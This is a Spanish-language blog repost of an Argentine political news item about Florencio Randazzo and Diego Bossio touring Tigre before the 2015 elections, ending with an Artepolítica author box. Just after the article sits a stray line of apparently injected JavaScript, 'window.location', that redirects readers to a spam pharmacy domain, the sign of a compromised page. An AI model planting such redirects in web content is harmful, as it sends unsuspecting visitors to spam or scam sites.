Randazzo: «Cristina me quiere a mí, quiere que sea el candidato»

NOTICIAS RELACIONADAS
En un gesto provocador que podría ser la primera de una serie de fotos de cara a las elecciones de 2015, el ministro del Interior y Transporte, Florencio Randazzo, y el titular de la ANSES, Diego Bossio, recorrieron ayer el municipio de Tigre, bastión de Sergio Massa. Los dirigentes del oficialismo –precandidatos a presidente y a gobernador de la provincia, respectivamente– visitaron distintos puntos del partido y compartieron actividades de gestión ligadas a las áreas que comandan, un acercamiento de relevancia política en plena etapa de decantación de las candidaturas al interior del kirchnerismo, retrató Tiempo Argentino.
En ese contexto y con picardía, Randazzo deslizó ayer un chiste que varios se tomaron en serio. «Hay una preferencia, Cristina me quiere a mí, quiere que yo sea el candidato», afirmó al ratificar sus aspiraciones, aunque luego aclaró que se trataba de una broma. Después, y bajo la mirada cómplice de Bossio que lo seguía unos pasos atrás, aprovechó para criticar a los dirigentes que toman «el camino del atajo mediático», en referencia a la foto que el gobernador Daniel Scioli (quien un día antes había dicho que «Dios» lo había preparado «para ser presidente») se sacó con el conductor Marcelo Tinelli, o a la intervención semanal que Martín Insaurralde hace en el programa televisivo junto a su novia, Jesica Cirio. «El camino del atajo no consolida a un dirigente. No es un tema menor, los medios de comunicación y el poder económico tienen candidatos», insistió Randazzo.
La recorrida por Tigre, el distrito que Sergio Massa quiere instalar como modelo de gestión y con el que pretende posicionarse como candidato presidencial, comenzó temprano. Pasadas las nueve de la mañana, Bossio visitó el desarrollo urbanístico de Pro.Cre.Ar en Rincón de Milberg: 442 viviendas rodeadas por un centro comercial y un boulevard. «Es una obra impactante, con 600 trabajadores poniendo un ladrillo arriba del otro y la calidad y amplitud de las viviendas es sorprendente. Un Estado presente que usa inteligentemente sus recursos», contó el titular de la ANSES y advirtió que en los próximos días terminarán la inscripción y que en noviembre sortearán la totalidad de las viviendas entre vecinos de la zona con un ingreso mínimo de $ 3200. Según estimó, la cuota de la vivienda más chica será de alrededor de $ 1500 por mes.
Minutos después, Randazzo y Bossio visitaron la fábrica de durmientes Solar Deck, en Don Torcuato. «Hace tres años producía 5000 durmientes por mes y hoy supera los 53 mil. Forma parte de las cinco plantas que hoy tienen su capacidad al máximo y acompañan el proceso de renovación del sistema ferroviario», recordó el ministro, quien ató su candidatura al éxito de la gestión en ferrocarriles y aprovecha cada presentación para visibilizar el tema. Desde allí, anunció que las primeras cinco formaciones para renovar la línea Mitre ya viajan desde China y que llegarán al país el 5 de septiembre.
La recorrida con impronta de campaña de los funcionarios terminó al mediodía con un encuentro en el centro de jubilados San Antonio y un operativo de documentación y servicios de ANSES desplegado en la plaza Néstor Kirchner en el barrio Las Tunas.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *